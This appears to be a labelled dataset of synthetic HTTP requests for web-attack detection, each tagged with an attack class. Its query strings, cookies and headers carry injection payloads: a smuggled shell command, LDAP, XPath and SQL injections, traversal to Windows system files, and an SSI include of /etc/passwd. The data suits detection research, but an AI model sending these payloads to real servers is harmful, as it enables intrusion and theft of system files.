Accept: */*;q=0.5
Accept-Charset: cp-936, iso-8859-8-i, ks_c_5601-1987
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 227.191.80.33
Cookie: oThvslw=71;gi7rrmsru6=l9e;tee=ryhd3;sttMnel=seetl(iti;eeBomresiac=u\sa~tkrt
Cookie2: $Version="66"
Date: Thu, 30 Nov 06 20:28:40 UTC
ETag: "8EMWsrpgGBvHJnZ9p9om"
Expect: 0sTS
From: otln@tpiaietAi5.st
If-Modified-Since: Sun, 20 Jan 08 19:44:22 GMT
If-Unmodified-Since: Sun, 13 Aug 06 09:04:54 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: nae8oa ufesao=bnthuhs
Range: 6-,-18019
Referer: http://t6muYQeg.it/hehZ62B6.jsp
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/4.1 (X11; U; Linux i586 7.7; lt-lx; rv:8.5.8) Gecko/14838395
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: FTP/5.0 www.og9nrsr.gif
Transfer-Encoding: deflate
Upgrade: peor/1.1, d2rrnr/4.2
Warning: 968 150.103.51.182:94997 "eidcatleEean" "Fri, 27 Aug 04 02:02:34 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49382
Start - Id: 43314
class: OsCommanding
GET /nDOY57d1mQ@ipqNzpJ/avaaeEraer/dcJg@A0NH8GJQ._rz5Ru/2EWkGMfunioncSa8C/gR/uiMpowvrBKv/nYv@Xu9P/b_YfIT/bDM9Vb/enT/so8/crtrrorfn.php4?blhh6wi=%3Csamrg1uolvqsTandwgpasswdyt6&e1lheikbnlu8no9=Nrem&lfbt1=insert&hRaocrnc=zndo6udxoOaber08&adeaeZogw=088&rSeaaefteIonar=%3A%3F+ai&nuuuOudsa=205245657&rPael5_k=36171288&qatotarGit=r&form1ediDZ=%27++%3B+ps++++-aux+%3B&es0s=eiddmsoei&in15st=8&6chpdiemjDNszed=40357932&s3=cl%2BgteTp&z.24tg@yQg=syStx.3-KSQ HTTP/1.1
Host: www.poeo.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: vsse='evi'
Client-ip: 170.237.233.234
Cookie: oih2U7wa662nw=46;VfM9E.cgy=RlSo1E7|e
Cookie2: $Version="3"
Date: Fri, 15 Jun 07 06:37:29 CET
ETag: "_3UpwIcb6mNaMxm3B"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 27 Oct 05 15:13:15 GMT
If-Unmodified-Since: Thu, 12 Jun 08 09:10:20 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Feb 10 05:59:42 CET
Max-Forwards: 5848
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: Digest qop=mokEmOt
Range: 7-25,-90,16289-
Referer: http://inree7.de/2aMenha/mNir/otdIc/erheunlc/4tol.fgf
TE: gzip;q=0.6,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/9.5 (Machintosh; U; PPC Mac OS X 0.2; s3-ci; rv:0.3.0) Gecko/63772176
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 0027347
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43314
Start - Id: 37216
class: LdapInjection
GET /sHWbT7lIpGeJS@w/MzMOobject@1mrQ/yn3itntt65r3rhwlnumb/i@r3pQyQy.exe?ho5ht1ibi=re&ImhuBjM=egt+&ditosommao9sne=9&srI3iesnes=%40vbscript1&6eal6leIci=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&qvt6A1=nAlpasswd&s0etq7irstntm6=sKYlGbVVf&rsoetin=uau%2FI%3Aap+azDWao2+ HTTP/1.0
Host: www.i2an.it
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: koi8-r, euc-kr;q=0.9, iso-8859-6, iso-8859-8-i;q=0.2, x-mac-arabic;q=0.2
Accept-Encoding: gzip, identity, identity, compress;q=0.6, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.64.159.239
Cookie: ns3etctz3oe0=76
Cookie2: $Version="284"
Date: Sat, 24 Jan 04 06:46:32 CET
ETag: W/"nGU3RVy8tOKIK4L"
Expect: eesgne
From: bttylert@dlnrhsoe.org
If-Modified-Since: Sat, 23 May 09 24:42:34 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: "uXN569IZFBPm-xw1u2"
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 7
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: tDe6E m4epcS4h=efrrIta
Range: -906
Referer: http://mtupy4.be/nghncye/odthdlqu.pdf
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 7.1; et-lx; rv:0.8.3) Gecko/14078525
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: HTTP/2.1 87.198.198.106, emut/6.8 147.231.221.54:7365
Transfer-Encoding: esvsd
Upgrade: etyvet/1.7, 9mEHd/4.9, saaq/1.8, 9irhSi/8.2, ooten3/4.3
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37216
Start - Id: 37242
class: LdapInjection
GET /irEZx_8NtGBn6MB0@A8/YMUM8varKKgD8A7X/ixvPbaRe1/VKhN/ny1t/axLN0ronDtueiqns/8y1An9metsfuI/paIaahlkrndmsnEmde/A8.png?rSiuerets1Shoe=7675716425&eh109ct9eX4=boot.ini%7E%3E&en7=awp-9ptmpopobjectiJajr1&7ereoe0elrlDe=483%29%28%26%28objectClass%3Dr6on%29%28%7C%28sn+%3Dvp%29%28cn%3Dlgh+++J*%29%29 HTTP/1.1
Host: 126.248.203.195
Connection: keep-alive
Accept: application/zip;q=0.2, video/mpeg, audio/*;q=0.0
Accept-Charset: cp-950, iso-8859-8-i;q=0.7, cp-932;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 206.100.255.13
Cookie: deey=K 
Cookie2: $Version="556"
Date: Wed, 02 Jul 08 16:40:09 GMT
ETag: W/"fGQbBlOes2k28gT0z"
Expect: nnsar
From: setrsl@itqn6e.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Sat, 09 Jun 07 09:58:36 CET
If-Match: *
If-None-Match: *
If-Range: "A1up1YKmbEegNY7Jj0"
Max-Forwards: 571
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: http://www.Lni4.net/u4oel.aspx
TE: deflate
Trailer: Accept-Language
User-Agent: ctyhwds
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: weqp; e0tpea4=ettre
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37242
Start - Id: 44903
class: PathTransversal
GET /roe/M@S77AdR_AQ/oLG-.r7EaJG/iPbW/nEZ_nxi/oe4Ds0FG5s/onlpechE18mcmi6e43ft/bGdalsri/lu_/lmroaeTi/9Z0i/txaqllmanadse2ttxqbh.jpeg?tatOtVeith=Urp&hnotwE=tNmaaptoIrrd5vq&oscecq0ahiit=rmEwm%40Q_Obms&rettt5z=060275&ccHpInAutag=08104207&nkveacTbn=935&aa=dnjmsaosmIiween&g4lbt4frt=s-0UPPOk214&B.n5fOJ=eanpasswdnara+&oibaD5scnyr=497027004&anT=grw9oqsm&gt=8761&Jhfodyaeueeh=884&ee23eu9eqHe=ow%25maev1tddQ%7Enetcat&ut4g=collection%28+++file%3A%2F%2F%2Fc%3A%2F4Yl%2Fnmnsi1.xml+++++%29 HTTP/1.1
Host: 129.250.166.115
Connection: ie1eee
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: ed-adssynW, Aene-mmaas, i-niSmE;q=0.2, temd-eml;q=0.3, E-ietkg;q=0.4
Cache-Control: max-age=3
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="171"
Date: Fri, 07 Jan 05 22:45:18 UTC
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 19 Feb 06 02:42:27 UTC
If-Unmodified-Since: Mon, 15 Mar 04 22:25:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4939
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic V3NFU2lwY2w6ZWF5YTRs
Range: 78821-,-584,26-7
Referer: /8ieda/nutasgg/1ftsdnj3.php4
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (compatible; MSIE 5.2; Solaris; bmfq; aorsisa; ujrt5oe)
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/4.3 116.247.21.28, Enh/6.9 21.51.91.144, 7.1 111.79.44.35:3302
Transfer-Encoding: znxu
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 600 135.61.40.75 "toa8hm6a" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44903
Start - Id: 48318
class: XPathInjection
GET /eElmertktGotitdT/Y9yhPab/bD2KcpCftpDCD/5NXD.bin?lv=dOmwe&-VOZetcKvJoptW=epv8&tuheyceyBh=9sdwt&ad5xhse=74232&dnQicmRoua=dao&eesshRb11iciG=nboot.inill6&due=sN9r0ex&ltnd=9&nhrCfds=154&IDgwn=aIt9eoeatl&sN5u84A=geni+&dydx=+4tdr&M0s87EXBinsfrom=Ephl%2F&fwebaotNbPx=r+i&eRdnxmlaeltbtiO=30 HTTP/1.0
Host: 176.2.96.243
Connection: 8dosExte
Accept: application/x-tar, video/mpeg;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 21     or     eaatd/Nanao/s/child::node()[position()=8]    or     3=
Accept-Language: remaih-iRE;q=0.0, uo-h5;q=0.2, lnAnoofi-dced5bwy, roa-p, mobtoeer-4sBiwrdd
Cache-Control: max-stale
Client-ip: 90.58.128.202
Cookie: rnmAgahiNra=nY3NTLXa
Cookie2: $Version="3"
Date: Fri, 14 Oct 05 11:02:17 UTC
ETag: W/"6UUI1@JW63a.jma2f1"
Expect: preieae1=rrnnt7r
From: tlgvoTUc@weaHAo.be
If-Modified-Since: Thu, 10 Dec 09 19:10:19 GMT
If-Unmodified-Since: Sun, 04 Oct 09 19:49:47 GMT
If-Match: "IHkQOTRC9jA1zEWqG@1"
If-None-Match: *
If-Range: "od@Rp-TXux0Nbrg"
Max-Forwards: 025
MIME-Version: 6.0
Pragma: t='ety'
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: ro2Xo ulta=pOrntd6
Referer: /etsnro/ireao/ltDonwA/3S5ieH4/62aw.mp3
TE: trailers,chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: biartoijerufeir
UA-Disp: 296,6544,16
UA-Color: color32
UA-Pixels: 433x249
Via: 0.5 www.onileto.jpg, pmwshi/7.2 21.94.135.100:329, 6.9 www.rdtwirs.html
Transfer-Encoding: nroNns; twirb=derws
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48318
Start - Id: 35692
class: XPathInjection
GET /gttftp56As/hhlnheldrrtdaghdsl.shtml?st5neCiS088em4=Seiloha%27++++or++++1%3C++++h3ploh%2Fti%2Fi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D20%5D+++++or++%273De2jxnl%27%3D++++%27&Vqpa5t=seu%25&eye=n+ghttpsssametIhhttpsnl5&rCssr=9go%25%5D%3E7ermtisfae4rDn&nrr4h0=9 HTTP/1.0
Host: www.e42aEav.ch
Connection: srshh
Accept: */*;q=0.1
Accept-Charset: windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 50.131.48.51
Cookie: 7a8MwhereKLHV2=tdtRwp-?tX3zporoca;ndienima=f9ttlw9P8nnD;lz2=07
Cookie2: $Version="50"
Date: Tue, 01 Aug 06 04:50:48 GMT
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: fbtsncr
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Fri, 06 Feb 09 22:26:13 UTC
If-Unmodified-Since: Sat, 12 Aug 06 22:39:28 UTC
If-Match: *
If-None-Match: "tdNluFRw5mCSu7GRSx"
If-Range: *
Max-Forwards: 5
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: NTLM Nm9LZW05b2hud3NldTBzbWxlbnplYWVidEYyZGVXQWRkbmlsb1Vua2xuMHNybnRl
Authorization: Basic aWJVZnRpOmVmaEU=
Range: 5225-,8-9,1-
Referer: http://www.qmb8e.biz/Joo6aa/eano/dvhsokl/ikrttr/nso3bF8e.msf
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/4.0 (Windows; U; Windows NT 4.9; sp-Mo; rv:6.7.7) Gecko/90033543
UA-CPU: PowerPC
UA-Disp: 165,7015,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: HTTP/7.1 140.253.252.223
Transfer-Encoding: identity
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 211.136.86.197
X-Serial-Number: 727389738621693748
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35692
Start - Id: 45505
class: PathTransversal
GET /grUmgye/oz6M5nEZeKtuLs6L/pefteMe5re/nKbK9QVQXre/lyrt46emDRU6R7mBnGF/tEj7k/yhlrwIs3fe/i8rY/wua0aeyndpanp/psM3-33XcT/seb/ATUnj4ZP.cgi?rPred8n=%5CWINDOWS%5Csystem.ini&egy=hA5oX HTTP/1.1
Host: www.pajiiA.fr:80
Connection: close
Accept: */*
Accept-Charset: x-mac-roman;q=0.7, cp-950;q=0.8, windows-1250, iso-8859-9;q=0.0, iso-8859-3;q=0.7
Accept-Encoding: 
Accept-Language: sh9-dler, istiA-2T, zf1feih-orsit;q=0.9, nvdS28-Et
Cache-Control: no-transform
Client-ip: 136.132.185.114
Cookie: ut9=auaolsmlqedWM
Cookie2: $Version="145"
Date: Wed, 17 May 06 09:12:16 GMT
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: tetsj@adnocr.uk
If-Modified-Since: Tue, 05 Jul 05 10:26:01 GMT
If-Unmodified-Since: Tue, 17 Feb 09 24:15:32 GMT
If-Match: "QO2720Qape2JP0k"
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: *
Max-Forwards: 4
MIME-Version: 2.3
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth-int
Range: 354-,63882-
Referer: /smens.cgi
TE: trailers,trailers
Trailer: Upgrade
User-Agent: suoh5gt1
UA-CPU: MIPS
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2096x915
Via: 7.8 6.182.109.221
Transfer-Encoding: compress
Upgrade: paa/8.6, yprO/1.1
Warning: 851 www.az5hggy.shtml "VesmErqyeabiHr" "Sun, 05 Mar 06 07:25:39 GMT"
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45505
Start - Id: 39775
class: SSI
GET /NZitq-PUzscriptW.jpg?sranri8EnRnji=%3C%21--++%23include++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&7..bdocumentsZF=5 HTTP/1.1
Host: www.ftoSelE.cz
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Smaos-Nou, fze-edomPqL, gt-eoboa, p-rasKpsar;q=0.2
Cache-Control: s=ttoegdh
Client-ip: 211.6.11.10
Cookie: oa=rael;atCzrd354hip=0420
Cookie2: $Version="712"
Date: Thu, 13 Oct 05 14:27:10 GMT
ETag: "m8H_3TREv-OT1yk"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 08 Jul 04 24:46:17 UTC
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 265
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Digest cnonce="aEEac"
Range: 42-82,601-32,-86
Referer: http://sa7op.fr/sren/cle7n.jpeg
TE: deflate;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: tloHasb (ndob109A3w; cQ6rHK@; t4w63uspnG; cN6@NT; u4UF8n)
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 357x4433
Via: HTTP/8.2 22.173.37.38
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39775
Start - Id: 42446
class: SqlInjection
GET /ZwTk9QuChE/Xh8/8-AhMyQlCEY8/o@VKQHrogjamnVsESGi/eipte/-c1WYKyZinNM6%uu/agot5tli1fgrteale/anaiwtm/AmneztlNa2gsDwtru/DCV/nDIBIw_b4zdCI5d6a.exe?i7yrxpfopeao=at7&aoa=%3Ekhno&tjLIyat=njTF-exgQS&re3=%27++OR+++%27oaeo%27++++LIKE++++%27aze%2525&oee=3835795331&euRxneudtsouEo=718103 HTTP/1.1
Host: 23.1.155.188:80
Connection: close
Accept: image/png;q=0.2, application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 253.155.111.28
Cookie: e8f6ek=1tThVGqSGP;blztwot=306142;sm=2oz3i9e5i;nsiwia=gh;5hoyrar=3470
Cookie2: $Version="122"
Date: Fri, 17 Jul 09 18:28:07 UTC
ETag: W/"Ng0H_XYkXY0iPSN"
Expect: 8iyua=geano5a;hrrnm=tEmsnt
From: sghAd@3nTei.org
If-Modified-Since: Tue, 28 Sep 04 22:30:47 UTC
If-Unmodified-Since: Mon, 17 Jul 06 03:57:42 UTC
If-Match: "Yd4.RPTuLWsCuF9"
If-None-Match: "sUmghx9.Fo4xOPb"
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 1377
MIME-Version: 0.7
Pragma: eblmoe='msqTsn'
Proxy-Authorization: Digest realm
Authorization: Basic MGxkNWRhOmtlaGlp
Range: 378414-80248,967-,-2698
Referer: /eliCin/rj6ecfs/fe4eoag.pdf
TE: deflate;q=0.0,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 1.6; er-as; rv:9.7.8) Gecko/66912354
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x6235
Via: sgt/9.9 219.217.149.18, FTP/9.4 www.6tEK.htm, 3.5 www.6ufpt.png
Transfer-Encoding: compress
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42446
Start - Id: 42085
class: SqlInjection
GET /.wMTvi2xbinkpasswd/uJn_BKrxaOeI6c3RFMx-/ettpeti3IfO/ohbsi5hesHeIcNet/w-f@FYAMJF/j6DLJG/fbhtn22eNta.html?XXauYGmaillpaj=gm1u3ptEtoIo&yeaena=t%40&eeafsdhDc=o2ToJtmB5&ppCPTTflog=xtEZ-Vpifg&rrbiebree3sn=1055&cnotUiruwke=210&aentisga9se=ltahobject&2nopscef8clkcu=%27++OR+++%27%27%3D+%27&a9oqs=ttmSic7deA HTTP/1.0
Host: www.i0bde.it
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.5, koi8-r;q=0.5
Accept-Encoding: identity;q=0.0, deflate, identity, compress;q=0.5, compress;q=0.4
Accept-Language: cvftp-p4ii0o, fi-apennRiu;q=0.8, npo6ydi-2tnletIk;q=0.6, i91t-gNnitaa;q=0.2
Cache-Control: max-stale
Client-ip: 183.141.254.90
Cookie: al=xgna6@%7 ;ploJa0yjHr=lsj T;iEbrrrio=hT l;lsaiw3d5=45092
Cookie2: $Version="068"
Date: Tue, 29 Mar 05 24:00:13 CET
ETag: "m0e.RyTZWMInQHe"
Expect: 100-continue
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 31 Dec 04 14:30:27 CET
If-Unmodified-Since: Thu, 27 Nov 08 20:07:43 GMT
If-Match: *
If-None-Match: "CBdoAIx1Iol5FHJG"
If-Range: Sat, 26 Jul 08 01:22:03 CET
Max-Forwards: 1312
MIME-Version: 0.9
Pragma: eso=n
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: http://aqulud.org/cetsatcd/tdnET2lA/anecE/thoNfph/w1s7adx.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: xCb2.iLxQa http://www.boxwnn9.st
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 861x9768
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: compress
Upgrade: a3r/9.3, rhiho/2.1, tse/5.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42085
Start - Id: 37439
class: LdapInjection
GET /aNLC0gD9t/foWw5bYz/6w4nsAnhg1i/r5eezhWuaber.cfm?.zZKXmIg=9&aiirt0tspdsNr=rjH%40OqraNM&QMZnph--zDs3unionlike=7370212 HTTP/1.0
Host: 148.195.99.164:80
Connection: keep-alive
Accept: video/*;q=0.9, image/*;q=0.8, image/*
Accept-Charset: iso-8859-7;q=0.3, iso-8859-5;q=0.5, utf-8, hz-gb-2312, iso-2022-jp;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 134.69.126.83
Cookie: ynC9nmli=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="58"
Date: Wed, 26 Jan 05 23:35:02 UTC
ETag: W/"9yb6ubAF1-mBhQ6qS"
Expect: 100-continue
From: arSeni@esqqy2etgc.cz
If-Modified-Since: Tue, 28 Oct 08 11:39:02 GMT
If-Unmodified-Since: Sun, 17 Jan 10 12:29:14 UTC
If-Match: "-kvNGdR-jzH4zd8KI"
If-None-Match: *
If-Range: Thu, 26 May 05 06:26:56 UTC
Max-Forwards: 544
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: nlct tngmes=oZoE0u
Authorization: NTLM RVNuZG9PdHp1MGRvalNIb0JlZWVic04wb2RlWWFkM2lh
Range: 5-,-09309
Referer: /rVamnho0/orbr8/u6r2/tatdn.html
TE: trailers,deflate,deflate
Trailer: Cache-Control
User-Agent: srn4sw/8.1
UA-CPU: x86
UA-Disp: 9236,912,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7873x595
Via: HTTP/5.2 42.59.133.142, 8.3 125.153.197.81
Transfer-Encoding: identity
Upgrade: ha76c/4.1, Dceo/6.5, ohampr/8.1, Hxa/3.5, mel/8.8
Warning: 343 94.74.47.202 "eqsris3" 
X-Forwarded-For: 218.58.31.100
X-Serial-Number: 973264
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37439
Start - Id: 42705
class: SqlInjection
PUT /e9bd@/sSVnXLll0KOsB9SB/telnetyz2CrcpoT/cn_7xvgj2S6Sykt/h95EXtg_MxLw/z1ZVF4/07gBIqygGjup57lqKC/5dvrunketoIdnsstth.html? HTTP/1.0
Content-Length: 154
Content-Language: adic,76
Content-Encoding: gzip
Content-Location: /g2b5o/wsuntMX/ecqN/edmlet/iuqoot.txt
Content-MD5: MG9zc2huNGVoc01pYWhlbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 12 Sep 09 23:09:30 CET
Host: www.l0as.com:66211
Connection: keep-alive
Accept: image/*, audio/*;q=0.3, text/*;q=0.2
Accept-Charset: euc-jp;q=0.8, x-mac-chinesesimp, x-mac-japanese, x-mac-korean;q=0.1
Accept-Encoding: deflate
Accept-Language: '     group by users.id  having  7111=7111
Cache-Control: only-if-cached
Client-ip: 228.125.37.130
Cookie: dso=hji;l4foilheyfcuae=eamjsamrqnInvi;rrsTnlt=53;oa3sl=4httpstnjt;xtOp1=ctrVaojiqoifNo;ue8=bdiwgdus
Cookie2: $Version="3"
Date: Mon, 10 Nov 08 17:03:16 UTC
ETag: W/"AZn3Yd1aCW924Iy"
Expect: ydtvhiN
From: Oet0ltm@iaaEjEAa1.fr
If-Modified-Since: Wed, 04 Nov 09 05:11:11 UTC
If-Unmodified-Since: Mon, 14 Jul 08 15:07:42 CET
If-Match: *
If-None-Match: "7z7jo--97VMtPwm5daR"
If-Range: Wed, 07 Jan 09 22:29:52 CET
Max-Forwards: 7
MIME-Version: 9.7
Pragma: areatpd=nrsaIta
Proxy-Authorization: Basic Z3Q1ZHZvSTp0c29ubw==
Authorization: NTLM WWttb2FlZUllNnRpc3J3dGF5bjhuaTZ1ZGRkZWx0bGFlbmJpdVdsRGNoaDhhOGt2
Range: -952,0696-,189-4
Referer: /shnavl.rar
TE: gzip,gzip,gzip;q=0.2
Trailer: Range
User-Agent: Mozilla/9.2 (compatible; MSIE 6.4; Windows NT; ret7R7isdi; E4ere)
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: fn41vs/8.5 171.33.154.48:90, tsa/9.7 www.itRUeoan.jpg
Transfer-Encoding: compress
Upgrade: stwept/3.7, 3caoys/9.9
Warning: 745 www.otrKU.jpeg "mdsiI" "Sun, 31 Jul 05 23:34:34 CET"
X-Forwarded-For: 18.244.48.193
X-Serial-Number: 0088484140288112965
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ierSnubhuhmd=titgaei&88ts=807872484&utoeow7ehia=uhgtiiltt8eafromm&yisOsatrg1rt=a1k&somMuussIa=tryvolyoEoscDd&oocIdm=uz0OTr8J&zdesbry56frnip=810&hcd=qeE1m2

End - Id: 42705
Start - Id: 40273
class: SSI
